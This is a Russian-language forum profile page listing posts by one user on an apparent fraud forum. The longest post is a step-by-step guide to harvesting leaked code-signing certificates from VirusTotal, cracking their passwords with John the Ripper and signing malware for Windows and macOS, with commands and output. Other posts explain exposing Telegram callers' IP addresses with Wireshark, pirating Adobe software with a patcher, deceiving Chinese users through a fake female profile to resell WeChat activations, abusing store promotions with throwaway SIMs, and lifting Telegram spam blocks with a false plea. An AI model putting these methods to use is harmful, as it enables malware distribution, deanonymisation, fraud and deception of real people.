Перейти к публикации

lalalak

Участник
  • Публикации

    33
  • Зарегистрирован

  • Посещение

Все публикации пользователя lalalak

  1. есть способ его как-то интегрировать на сайте своем?
  2. есть у кого нибудь бомбер нормальный?
  3. lalalak

    PayPal

    Дедик 100 проц, так раньше было и сейчас категорически ничего не изменилось.
  4. lalalak

    сенды PP

    Одни темы с пайпалом, давно такого не было, может самому вновь залетать?
  5. Уже не актуально! Озон гайки закрутил теперь только селыи с паспортом нужно
  6. Не знаете, можно где-то купить галочку для тг канала? Или может у кого-то в двух соц сетях есть галочки?
  7. lalalak

    тг премиум

    знает кто как сейчас сделать тг премиум недорого?
  8. Никакой софт нам особо не нужен, только сам Telegram и wireshark для анализа трафика: 1. Запускаем Wireshark и в фильтре обязательно указываем нужный нам протокол — STUN; 2. Затем нажми на лупу (Найти пакет) и ты увидишь, как у тебя появится новая строка с параметрами и поисковой строкой. Там выбираем параметр Строка; 3. В строке пишем XDR-MAPPED-ADDRESS; 4. Включаем wireshark и звоним через Telegram. Как только пользователь ответит на звонок, тут же у нас начнут отображаться данные и среди них будет ІР адрес юзера, которому звонили; 5. Чтобы понять, какой именно IP нам нужен, жмем уже в настроенном поисковике Найти, ищем в строке XDR-MAPPED-ADDRESS а то, что идет после него и есть нужный нам ІР. ❌ Как этого избежать? – Просто выключи peer-to-peer подключение и ничего не бойся!
  9. От себя хотел добавить, что и такие кошельки нормас, пусть не жирные, но пара таких кошельков уже делают приятною сумму https://blockchair.com/litecoin/address/MTauxaXTWjxGo4cPrDoBu4f14KAwG5sqBi
  10. Перед вами невероятно годный лайфхак для всех, кто активно пользуется мультиаккаунтами в «Telegram» — название мануала говорит само за себя. 1. Покупаем номер в любом удобном сервисе приема смс и регистрируем аккаунт «Telegram»; 2. Авторизуемся в аккаунт и выходим из него до тех пор, пока мессенджер не предложит привязать почту для входа. Обычно это происходит через 3-7 попыток; └ Таким образом в следующий раз мы получим код для входа в «Telegram»-аккаунт на email, а не на номер; 3. Поздравляю, вы великолепны!
  11. Магазин «Дикси» запустил акцию, в рамках которой за прохождение мини-игры можно получить до 1.000 монет-кэшбека на карту лояльности. Акция продлится до 5 октября. 1. Скачиваем приложение «Клуб Друзей Дикси» ; 2. Проходим регистрацию через левые сим или сервисы приёма смс; 3. Переходим по баннеру "Получай призы в игре каждый день"; 4. Играем в простую игру, где нужно допрыгать шариком до финала уровня, не упав вниз; └ В день доступно 2 попытки; 5. За прохождение уровня получаем от 5 до 1.000 монет-кэшбека (1 монета = 1 рубль); 6. Поздравляю, вы великолепны!
  12. Перед вами схема по заработку на активациях мессенджера «WeChat». Вкратце, это закрытый мессенджер для граждан Китая и для того, что бы получить к нему доступ, нужно намутить инвайт от человека, у которого уже есть активированный «WeChat». Если вбить в поисковик словосочетание «активация WeChat», то можно найти массу сайтов (скриншот 1 ), на которых продается данная услуга по 1000-2000₽. Так вот, мы будем продавать услуги активации мессенджера владельцам таких ресурсов, при этом не потратив ни копейки на вложения. Что делаем? Для начала необходимо найти контакты скупа, которому мы и будем продавать наши услуги (ну или поднять свой собственный ресурс, но для этого потребуются вложения, нищим же могу порекомендовать «Авито»). Ищем как можно больше контактов и предлагаем им услуги активации. Автор мануала продавал одну активашку по 400-500₽. Дело за малым — остается только найти узкоглазых, которые будут активировать нам мессенджеры. Как же это сделать? Все просто! Cкачиваем приложения для языкового обмена а-ля «Hello Talk» и оформляем анкету красивой русской девушки. Думаю, многие знают, что наши женщины невероятно привлекательны для азиатов, поэтому они с радостью примут предложение переместиться в «WeChat» и заботливо активируют его нам. Одного китайца можно использовать несколько раз, под предлогом активации мессенджера для подруги, которая тоже изучает китайский. Так же хорошим ходом будет поискать отзывы от клиентов, которые воспользовались услугой активации ранее и договорится с ними (скриншот 2 ). Аккаунт приглашающего должен быть старше 3-х месяцев, иначе инвайтить не получится (но это не точно). Лучшим ходом будет самому заиметь аккаунт для приглашений. Как выглядит процесс продажи активации? QR-код для приглашения живет всего 5 минут, поэтому все это чертовски похоже на игру в «испорченный телефон» — сначала связываемся с скупом, он связывается с покупателем, мы согласовываем время для проведения активации и пишем китайцу (в идеале, китайцев должно быть не менее 10 штук, что бы не возникло проблем с приглашением), после чего просим сделать его QR-код. Что по профитам? У сервисов обычно достаточно большой поток клиентов который хотят вести бизнес с Китаем, поэтому заказов может быть более 5 в день только с одного сервиса.
  13. Первым делом: заходим на сайт адоб креатив клауд и качаем его: https://creativecloud.adobe.com/apps/download/creative-cloud Пункт 2 - загрузка вам нужных приложений. У вас они будут на 7 дней бесплатно, но в этом гайде мы получим их навсегда. После того как загрузили программы, идем на гитхаб и качаем кейген. https://github.com/cw2k/Adobe-GenP Пункт 3 - прошив на лицензию. Открываем эту программку: Нажимаем поиск и она ищет все программы адоб: После того, как нашла нажимаем патч и у вас все программы теперь с лицензией!
  14. 1. Поиск сертификатов. Существует множество различных способов найти сертификаты для подписи кода в Интернете. Если вам повезет, то вы можете найти тот, который все еще актуален. В своей статье я главным образом использовал VirusTotal, но на такие платформы как Grayhat Warfare и GitHub также загружено множество сертификатов. С помощью приведенного ниже запроса вы сможете найти файлы с последовательностью байтов, обычно наблюдаемой в сертификатах для подписи кода. Эта последовательность является частью файлов в кодировке ASN.1 DER (RFC7292). В качестве значения смещения (offset) 4 должен присутствовать номер версии, который всегда имеет значение 3. Это обозначается записью 02 01 03. Четвертый байт в последовательности равен 30, что представляет собой начало новой последовательности. content:{02 01 03 30}@4 NOT tag:msi AND NOT tag:peexe Результаты можно загрузить через графический интерфейс или API VirusTotal: Итого, я скачал около 50 сертификатов, которые недавно были загружены на VirusTotal. 2. Взлом паролей PKCS#12 Моя любимая программа для взлома хэшей — Hashcat. К сожалению, он не поддерживает взлом файлов PKCS#12. В то время как John the Ripper поддерживает PKCS#12. Сначала нам нужно извлечь хэш из нашего файла PKCS#12. Это можно сделать с помощью Python-скрипта John The Ripper pfx2john.py. Совместимый с Python 3 скрипт. pfx2john.py certificate.pfx > certificate.hash Если вы сгенерировали хэши на основе найденных вами сертификатов, вы можете взломать их с помощью John The Ripper с приведенными ниже аргументами. В данном примере мы используем rockyou.txt в качестве вордлиста. $ john --wordlist=rockyou.txt --format=pfx-opencl ./hashes/* Using default input encoding: UTF-8 Loaded 13 password hashes with 13 different salts (pfx, (.pfx, .p12) [PKCS#12 PBE (SHA1/SHA2)]) -- snip -- 123 (7f61a5a51fe9eef15c9e2ddf03fe10c6.pfx) 123 (66a9882f1d8463501f7fc89b1a12700b.pfx) (83bfdbd568b967baf24b7c44935b9a12.pfx) test (certificate.pfx) -- snip -- Session completed. Как можно заметить, некоторые хэши были успешно взломаны. Пароль для последнего — test. Проверьте, являются ли взломанные сертификаты доверенными и действительными (например, не были ли они отозваны CA). Для доверенных и действительных убедитесь, что у них есть идентификатор объекта подписи кода (OID): 1.3.6.1.5.5.7.3.3. Будем надеяться, что в результате у вас остался как минимум один сертификат. Теперь вы можете использовать его для подписи своего вредоносного кода! PS: если вы хотите использовать более обширный лист паролей с John the Ripper, поищите его на сайте Weakpass. Также рекомендую использовать маски паролей. Я добавил два соответствующих примера ниже, чтобы вам было с чего начать. # With rules ./john --wordlist=rockyou.txt --format=pfx-opencl ./hashes/* --rules:OneRuleToRuleThemAll # With mask ./john --mask=?1?1?1?1?1?1?1?1?1 -1=[A-z0-9\!\@] --format=pfx-opencl ./hashes/* -min-len=1 3. Подписываем код вредоносных программ Если вы по итогу нашли и взломали пароль для действующего и надежного сертификата, вы можете использовать его теперь для подписи вредоносных программ. Я продемонстрирую ниже пример подписи сертификатом вредоносного ПО как для Windows, так и для MacOS. Windows Для подписи PE-файлов существует замечательный проект с открытым исходным кодом под названием osslsigncode. После установки выполните следующую команду, чтобы создать подписанную версию вашей вредоносной программы. osslsigncode sign -pkcs12 certificate.pfx -pass test -in malware.exe -out signed-malware.exe Succeeded Чтобы убедиться, что подпись действительна и правильно применена, вы также можете использовать osslsigncode. osslsigncode verify signed-autoruns.exe -- snip -- Authenticated attributes: Message digest algorithm: SHA256 Message digest: C89F86DBE18BB37C44857F3535E5984DCA783610BDFEBF18F659F5275D8D5236 Signing time: Jun 7 18:49:06 2023 GMT Microsoft Individual Code Signing purpose -- snip -- Signature verification: ok Number of verified signatures: 1 Succeeded Обратите внимание, osslsigncode не проверяет, был ли отозван сертификат. MacOS Если вы подписываете существующее (модифицированное) приложение для MacOS, сначала удалите существующую подпись. codesign --remove-signature malicious.app После этого импортируйте сертификат подписи в свою связку ключей. Щелкните по ней правой кнопкой мыши и создайте новое удостоверение подписи. Используйте имя по вашему выбору. Теперь вы можете использовать это удостоверение для подписи вашего вредоносного приложения. codesign -s "your_identity" malicious.app Чтобы проверить, все ли заработало, проверяем подпись. Если все в порядке, команда ничего не выведет. codesign --verify malicious.app Если что-то пошло не так, будет показана ошибка. Вот как выглядит вывод, когда ваш сертификат был отозван: codesign --verify malicious.app malicious.app: CSSMERR_TP_CERT_REVOKED In architecture: x86_64
  15. 1. Общедоступные Wi-Fi в отелях могут быть использованы для кражи паролей и личной информации гостей. Рекомендуется использовать VPN-сервис для шифрования данных. 2. Смарт-телевизоры в номерах отеля могут стать источником кражи личных данных. Рекомендуется отключать телевизоры от питания, когда они не используются. 3. USB-порты для зарядки в номерах отеля могут быть модифицированы хакерами для установки вредоносного ПО на телефоны. Безопаснее заряжать устройства от розетки. 4. Автоматическое подключение к Wi-Fi может представлять риск. Рекомендуется отключать функцию, а также использовать VPN и брандмауэр. 5. Путешественникам следует быть бдительными к подозрительным письмам и файлам, которые они получают по электронной почте и в СМС-сообщениях. Для обеспечения безопасности в отеле рекомендуется использовать доверенные VPN-сервисы и приложения интернет-безопасности, а также регулярно обновлять программное обеспечение. That's all! Береги себя и свои штекеры, шекели!
  16. Для тех, кто не в теме, лендинг это одностраничник, который может использоваться в самых разных целях — от обычной визитки для слива трафика до продажи читов. Так вот, сегодня я расскажу как создать свой лендос бесплатно и без каких-либо заморочей. 1. Отправляемя на framer.ai и регистрируем аккаунт; 2. После этого перед нами откроется главная страница, на которой нужно будет нажать на кнопку «+New» (скриншот 1 ); 3. Переходим к редактору (скриншот 2 ) — ресурс предложит нам создать дизайн с помощью нейросети, но в подавляющем большинстве случаев она генерирует не то, что нужно, поэтому лучшим вариантом будет сделать сайт с помощью готовых блоков. Нажимаем «Insert» и переносим нужные нам блоки в редактор, попутно изменяя их под себя └ Интерфейс интуитивно понятен поэтому думаю вы разберетесь, как поменять картинку или текст. 4. Теперь необходимо добавить ссылки — для этого во вкладке «Layers» находим кнопку и задаем ей значение (куда она должна вести, скриншот 3 ); 5. Мы на финишной прямой — остается только опубликовать наш лендинг. В верхнем левом углу жмякаем кнопку «Publish» (скриншот 4 ), указываем название для нашего ресурса и еще раз нажимаем «Publish»; └ По умолчанию будет стоять домен .framer.ai, но его можно поменять докупив подписку за 5$; 6. Поздравляю, вы великолепны! Теперь к неочевидным нюансам — после каждого изменения в нашем макете необходимо нажимать кнопку «Update» (скриншот 5 ), иначе они не сохранятся.
  17. lalalak

    Бот для трейдинга

    Где купить бот для трейдинга?
  18. lalalak

    deepnude бот тг

    Скрипт бота [скрытый текст]
  19. Каждый из нас получал спам блок в ТГ, но получали ли вы вечный спамблок? Если нет, то этот метод всё равно будет полезен Сразу к делу ⬇️ 1. Переходим в бота ; 2. Нажимаем на кнопку: «Это ошибка» —> «Да» —> «Нет, ничего подобного не было»; 3. Отправляем вот такой вот текст: «I am from Ukraine, I can't message my family» 4. Ожидаем 10 минут и наслаждаемся возможностью полноценно вести переписку; 5. Готово! ☑️
  20. lalalak

    Можно ли взломать QIWI Кошелек?

    Ну д можно Задавай лучше правильно вопрос
  21. Кто-то знает, как сделать бота по приему смс?
×
×
  • Создать...